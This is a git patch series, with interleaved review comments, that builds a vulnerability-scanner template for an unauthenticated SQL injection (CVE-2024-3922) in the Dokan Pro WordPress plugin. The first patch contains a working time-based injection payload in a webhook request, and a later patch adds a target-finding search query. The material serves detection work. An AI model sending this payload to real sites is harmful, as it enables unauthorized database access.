From 0fca79694bc51ba05c08b0fd8685aac359714b42 Mon Sep 17 00:00:00 2001
From: Kazgangap
Date: Sat, 15 Jun 2024 18:31:49 +0300
Subject: [PATCH 1/3] add cve-2024-3922
---
 http/cves/2024/CVE-2024-3922.yaml | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-3922.yaml
diff --git a/http/cves/2024/CVE-2024-3922.yaml b/http/cves/2024/CVE-2024-3922.yaml
new file mode 100644
index 0000000000..c38b4e98aa
--- /dev/null
+++ b/http/cves/2024/CVE-2024-3922.yaml
@@ -0,0 +1,26 @@
+id: CVE-2024-3922
+info:
+ name: Dokan Pro <= 3.10.3 SQL Injection
+ author: securityforeveryone
+ severity: critical
+ description: |
+ The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-3922
+ - https://dokan.co/docs/wordpress/changelog/
+ tags: cve,cve2024,dokan,wp-plugin
+
+http:
+ - raw:
+ - |
+ POST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1
+ Host: {{Hostname}}
+
+ {"env":"1","event":"invoice.created","resource":{"subscription_code":"11111' and (select 1 from (select sleep( if(1=1,6,0) ))x )='"}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code == 302'
+ condition: and
From 197711ba5e196d086d3a0887ca10622c9466bba4 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Mon, 24 Jun 2024 14:05:07 +0530
Subject: [PATCH 2/3] minor update
---
 http/cves/2024/CVE-2024-3922.yaml | 28 +++++++++++++++++++++++++---
 1 file changed, 25 insertions(+), 3 deletions(-)
diff --git a/http/cves/2024/CVE-2024-3922.yaml b/http/cves/2024/CVE-2024-3922.yaml
index c38b4e98aa..1b902ca27b 100644
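Review bot: The `description` in PATCH 1/3 names the vulnerable parameter as 'code', while the request body in the same hunk places the test value in the JSON key `subscription_code`, so a reader of the template cannot tell whether these refer to the same field. Presumably `subscription_code` is the field the advisory calls 'code'; the description should either use the name that actually appears in the request, e.g. `... via the 'subscription_code' parameter of the dokan-moip webhook body in all versions up to, and including, 3.10.3 ...`, or state in one clause that the two names denote the same field. The two `reference` entries are a generic NVD page and the vendor's changelog index; a link to the disclosing advisory, if one is public, would let a reviewer confirm the `<= 3.10.3` range and the `critical` severity without re-deriving them. This wording is kept as a context line through PATCH 3/3, so the fix applies to the final file as well.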
--- a/http/cves/2024/CVE-2024-3922.yaml +++ b/http/cves/2024/CVE-2024-3922.yaml @@ -1,18 +1,40 @@ id: CVE-2024-3922 + info: - name: Dokan Pro <= 3.10.3 SQL Injection + name: Dokan Pro <= 3.10.3 - Unauthenticated SQL Injection author: securityforeveryone severity: critical description: | - The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. + impact: | + Unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + remediation: Fixed in 3.11.0 reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-3922 - https://dokan.co/docs/wordpress/changelog/ - tags: cve,cve2024,dokan,wp-plugin + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/dokan-pro/" + tags: cve,cve2024,dokan,wp-plugin,wordpress,wp,dokan-pro + +flow: http(1) && http(2) http: - raw: - | + GET /wp-content/plugins/dokan-pro/changelog.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + words: + - 'Dokan product' + internal: true + + - raw: + - | + @timeout: 20s POST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1 Host: {{Hostname}} From db61f8a095d7b8a2111fd5c178763cd5a8cde78e Mon Sep 17 00:00:00 2001 
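Review bot: The new `impact: |` block in PATCH 2/3 is not a complete sentence: `Unauthenticated attackers to append additional SQL queries into already existing queries ...` lost its main verb when it was split off from the original description's "This makes it possible for unauthenticated attackers to append ...". Suggest `Unauthenticated attackers can append additional SQL queries to existing queries and extract sensitive information from the database.` The same line is carried unchanged as context into PATCH 3/3, so it should be corrected there too.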
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 25 Jun 2024 13:21:11 +0530 Subject: [PATCH 3/3] updated info --- http/cves/2024/CVE-2024-3922.yaml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/http/cves/2024/CVE-2024-3922.yaml b/http/cves/2024/CVE-2024-3922.yaml index 1b902ca27b..b0552b2350 100644 --- a/http/cves/2024/CVE-2024-3922.yaml +++ b/http/cves/2024/CVE-2024-3922.yaml @@ -1,22 +1,23 @@ id: CVE-2024-3922 info: - name: Dokan Pro <= 3.10.3 - Unauthenticated SQL Injection + name: Dokan Pro <= 3.10.3 - SQL Injection author: securityforeveryone severity: critical description: | The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. impact: | Unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. - remediation: Fixed in 3.11.0 + remediation: | + Fixed in 3.11.0 reference: - - https://nvd.nist.gov/vuln/detail/CVE-2024-3922 - https://dokan.co/docs/wordpress/changelog/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-3922 metadata: verified: true - max-request: 1 + max-request: 2 publicwww-query: "/wp-content/plugins/dokan-pro/" - tags: cve,cve2024,dokan,wp-plugin,wordpress,wp,dokan-pro + tags: cve,cve2024,dokan,wp-plugin,wordpress,wp,dokan-pro,sqli flow: http(1) && http(2)